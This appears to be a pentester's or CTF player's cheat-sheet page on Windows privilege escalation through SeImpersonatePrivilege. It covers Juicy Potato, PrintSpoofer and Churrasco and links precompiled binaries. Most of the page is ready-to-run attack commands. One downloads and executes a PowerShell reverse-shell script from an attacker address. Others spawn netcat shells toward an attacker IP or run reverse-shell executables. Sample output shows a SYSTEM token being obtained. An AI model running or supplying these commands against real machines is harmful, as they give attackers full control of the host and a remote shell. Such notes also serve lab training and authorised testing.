search

SeTokenImpersonate

How to Test ? whoami /priv if seimpersonate token enabled very old machines like before 2008 ,windows 2003 :: - chimmi churi , chuarsco latest andrecent 64 bit ::- printspoofer preccompiled in between these :: rotten potato, juicy potato etc. both for 32 as well as 64 bits then juicy potato / printspoofer etc. printspoofer only works for x64 architecture for x86 try juicy potato reference links :: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotatoarrow-up-right https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3-1-1arrow-up-right pre compiled printspoofer exe x64: https://github.com/dievus/printspooferarrow-up-right pre compiled juicy potato x86: https://github.com/ivanitlearning/Juicy-Potato-x86/releasesarrow-up-right https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privilegesarrow-up-right https://www.puckiestyle.nl/token-impersonation/arrow-up-right

hashtag
How to Use Juicy Potato?

Spawning a PS rev shell :: JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/psrvsh.ps1')"arrow-up-right -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30} -a for cli arguments u want to pass for -c flag you need https://github.com/ohpe/juicy-potato/tree/master/CLSIDarrow-up-right (select your target os as per version and select any clsid , one by one try all see which one works) Try all of them one by one see which one works ::

hashtag
JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 ...... [+] authresult 0 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK

hashtag
How to Use Churrasco?

https://github.com/Re4son/Churrasco/blob/master/ReadMe.txtarrow-up-right churassco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.15 5353" -d for command to run ^cmd simple one liner nc reve shell

PreviousManualNextScripts

Last updated